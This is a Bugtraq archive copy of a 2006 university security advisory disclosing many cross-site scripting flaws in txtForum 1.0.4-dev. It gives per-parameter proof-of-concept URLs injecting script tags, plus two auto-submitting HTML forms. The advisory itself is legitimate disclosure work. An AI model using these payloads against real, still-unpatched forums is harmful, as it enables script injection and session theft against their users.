txtForum: Multiple XSS Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: txtForum: Multiple XSS Vulnerabilities
From: enji@xxxxxxxxxxxxxxxxxxx
Date: 9 Mar 2006 14:40:27 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

===========================================================
txtForum: Multiple XSS Vulnerabilities
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0603-003, March 9, 2006
===========================================================


Affected applications
----------------------

txtForum (http://sourceforge.net/projects/txtforum1)

Versions 1.0.4-dev and prior.


Description
------------

There are multiple cross-site scripting (XSS) vulnerabilities which can be 
verified by using the following exploits (the user needs to be logged in). They 
are roughly sorted by entry points (i.e., the names of the files that have to 
be navigated). The vulnerabilities were discovered under the assumption that 
register_globals is on, and that magic_quotes_gpc is off.


index.php
-----------

- skins/txtforum/under_topic.tpl, line 11
  (included by index.php on line 99)
  $prev: not initialized if the file "data/headers.txt" does not exist;
  exploit in this case: analogous to line 123 (see below)

- 122:
  $next: not initialized if the file "data/headers.txt" does not exist;
  exploit in this case: analogous to line 123 (see below)

- 123:
  $rand5: is never initialized
  
http://localhost/txtforum104/index.php?rand5=";><script>alert('xss_string')</script>


new_topic.php
---------------

- skins/txtforum/topic_form.tpl, line 17
  
http://localhost/txtforum104/new_topic.php?r_username='><script>alert('xss_string')</script>

- skins/txtforum/topic_form.tpl, line 18
  
http://localhost/txtforum104/new_topic.php?r_loc='><script>alert('xss_string')</script>


profile.php
------------

- skins/txtforum/viewprofile.tpl, line 11
  
http://localhost/txtforum104/profile.php?mode=viewprofile&nick=admin&r_num=<script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 18
  
http://localhost/txtforum104/profile.php?mode=editprofile&r_family_name=";><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 22
  
http://localhost/txtforum104/profile.php?mode=editprofile&r_icq=";><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 27
  
http://localhost/txtforum104/profile.php?mode=editprofile&r_yahoo=";><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 31
  
http://localhost/txtforum104/profile.php?mode=editprofile&r_aim=";><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 35
  
http://localhost/txtforum104/profile.php?mode=editprofile&r_homepage=";><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 39
  
http://localhost/txtforum104/profile.php?mode=editprofile&r_interests=";><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 43
  
http://localhost/txtforum104/profile.php?mode=editprofile&r_about=";</textarea><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 65
  $selected1: works if the user has set $r_hide_email == 0;
  else: use vulnerability below (selected0)
  
http://localhost/txtforum104/profile.php?mode=editprofile&selected1=";><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 65
  $selected0: works if the user has set $r_hide_email == 1
  
http://localhost/txtforum104/profile.php?mode=editprofile&selected0=";><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 69
  $signature_selected1: works if the user has set $show_sig == 0;
  else: use vulnerability below ($signature_selected0)
  
http://localhost/txtforum104/profile.php?mode=editprofile&signature_selected1=";><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 69
  $signature_selected0: if $show_sig == 1
  
http://localhost/txtforum104/profile.php?mode=editprofile&signature_selected0=";><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 73
  $smile_selected1: if $show_smile == 0
  
http://localhost/txtforum104/profile.php?mode=editprofile&smile_selected1=";><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 73
  $smile_selected0: if $show_smile == 1
  
http://localhost/txtforum104/profile.php?mode=editprofile&smile_selected0=";><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 78
  
http://localhost/txtforum104/profile.php?mode=editprofile&ubb_selected1=";><script>alert('xss_string')</script>

- skins/txtforum/editprofile.tpl, line 78
  
http://localhost/txtforum104/profile.php?mode=editprofile&ubb_selected0=";><script>alert('xss_string')</script>


reply.php
-----------

- skins/txtforum/reply_form.tpl, line 31
  
http://localhost/txtforum104/reply.php?quote=</textarea><script>alert('xss_string')</script>

- skins/txtforum/reply_form.tpl, line 43
  
http://localhost/txtforum104/reply.php?tid=";><script>alert('xss_string')</script>


view_topic.php
----------------

- skins/txtforum/next_preview.tpl, line 6
  
http://localhost/txtforum104/view_topic.php?page=27&tid='><script>alert('xss_string')</script>

- view_topic.php, line 12
  $tid is echoed at several places:
  
http://localhost/txtforum104/view_topic.php?print_adminJS=1&tid=";><script>alert('xss_string')</script>

- common.php, line 15
  parameter of admin_msg is echoed;
  - called from sticky.php, 39:

  <form 
action='http://localhost/txtforum104/view_topic.php?sticked=<script>alert("xss_string")</script>'
 method="post">
    <input type="text" name="where" value="sticky"/>
    <input type="submit">
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>

  - called from delete.php, 63:

  <form action='http://localhost/txtforum104/view_topic.php' method="post">
    <input type="text" name="where" value="deleteme"/>
    <input type="text" name="mid" value="<script>alert('xss_string')</script>"/>
    <input type="submit">
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>

- view_topic.php, line 244
  $next, via $tid:
  http://localhost/txtforum104/view_topic.php?page=-1&tid=xss_string

- view_topic.php, line 271
  http://localhost/txtforum104/view_topic.php?tid=xss_string

- view_topic.php, line 272:
  $tid: as before

- view_topic.php, line 280
  $tid: as before


Solution
---------

There is no solution to these issues yet.

Timeline:

February 23, 2006:
Vulnerabilities indicated via confy at users dot sourceforge dot net.
Provided detailed report of the vulnerabilities after the author's response.
No fixes are planned.

March 9, 2006:
Advisory submission.


References
-----------

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-003.txt


Nenad Jovanovic
Secure Systems Lab 
Technical University of Vienna 
www.seclab.tuwien.ac.at

Prev by Date: MyBloggie: Multiple XSS Vulnerabilities
Next by Date: txtForum: Script Injection Vulnerability
Previous by thread: MyBloggie: Multiple XSS Vulnerabilities
Next by thread: txtForum: Script Injection Vulnerability
Index(es):
- Date
- Thread